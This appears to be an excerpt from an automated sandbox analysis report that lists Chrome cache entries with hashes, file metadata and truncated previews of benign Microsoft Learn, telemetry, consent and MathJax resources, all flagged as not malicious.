                                                                                                                                                                                                                                          SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                                                          SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                                                          Preview:CgkKBw2/5iXyGgA=

                                                                                                                                                                                                                                          Chrome Cache Entry: 159

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):207935
                                                                                                                                                                                                                                          Entropy (8bit):5.420780972514107
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                                                          MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                                                          SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                                                          SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                                                          SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

                                                                                                                                                                                                                                          Chrome Cache Entry: 160

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):27868
                                                                                                                                                                                                                                          Entropy (8bit):5.155680085584642
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
                                                                                                                                                                                                                                          MD5:0A0F2E1CCB8E5F7C38CB11B101A8941F
                                                                                                                                                                                                                                          SHA1:112F4B7CB3DEDB9D9744CAC000E05DC949E89891
                                                                                                                                                                                                                                          SHA-256:DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
                                                                                                                                                                                                                                          SHA-512:9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

                                                                                                                                                                                                                                          Chrome Cache Entry: 161

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):207935
                                                                                                                                                                                                                                          Entropy (8bit):5.420780972514107
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                                                          MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                                                          SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                                                          SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                                                          SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                                                          Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

                                                                                                                                                                                                                                          Chrome Cache Entry: 162

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):27868
                                                                                                                                                                                                                                          Entropy (8bit):5.155680085584642
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
                                                                                                                                                                                                                                          MD5:0A0F2E1CCB8E5F7C38CB11B101A8941F
                                                                                                                                                                                                                                          SHA1:112F4B7CB3DEDB9D9744CAC000E05DC949E89891
                                                                                                                                                                                                                                          SHA-256:DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
                                                                                                                                                                                                                                          SHA-512:9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                                                          Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

                                                                                                                                                                                                                                          Chrome Cache Entry: 163

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):15427
                                                                                                                                                                                                                                          Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                                          MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                                          SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                                          SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                                          SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

                                                                                                                                                                                                                                          Chrome Cache Entry: 164

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):1432
                                                                                                                                                                                                                                          Entropy (8bit):4.986131881931089
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                                                          MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                                                          SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                                                          SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                                                          SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.029026183/global/deprecation.js
                                                                                                                                                                                                                                          Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

                                                                                                                                                                                                                                          Chrome Cache Entry: 165

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):464328
                                                                                                                                                                                                                                          Entropy (8bit):5.0747157240281755
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:XegPrbKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:1KCerXyUh
                                                                                                                                                                                                                                          MD5:875E7F3672FEC41DDB5A2386D2331531
                                                                                                                                                                                                                                          SHA1:282979933E99BDE3A6342DC1EF93FBC51682F2C3
                                                                                                                                                                                                                                          SHA-256:F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
                                                                                                                                                                                                                                          SHA-512:67A3C1D8FF089E01C20962D96968DE43F3E8D49B474C396F08827EE891C0315693634E663D3148D7441B501EA6939A7D84A80B1E855B7C2A8BCB17E0013AFAD4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.029026183/styles/site-ltr.css
                                                                                                                                                                                                                                          Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0

                                                                                                                                                                                                                                          Chrome Cache Entry: 166

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

                                                                                                                                                                                                                                          Chrome Cache Entry: 167

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

                                                                                                                                                                                                                                          Chrome Cache Entry: 168

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):1173007
                                                                                                                                                                                                                                          Entropy (8bit):5.503893944397598
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                                                          MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                                                          SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                                                          SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                                                          SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                                                                          Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

                                                                                                                                                                                                                                          Chrome Cache Entry: 169

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1817143
                                                                                                                                                                                                                                          Entropy (8bit):5.501007973622959
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                                                          MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                                                          SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                                                          SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                                                          SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

                                                                                                                                                                                                                                          Chrome Cache Entry: 170

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                          Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}

                                                                                                                                                                                                                                          Chrome Cache Entry: 171

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):13339
                                                                                                                                                                                                                                          Entropy (8bit):7.683569563478597
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                                                          MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                                                          SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                                                          SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                                                          SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
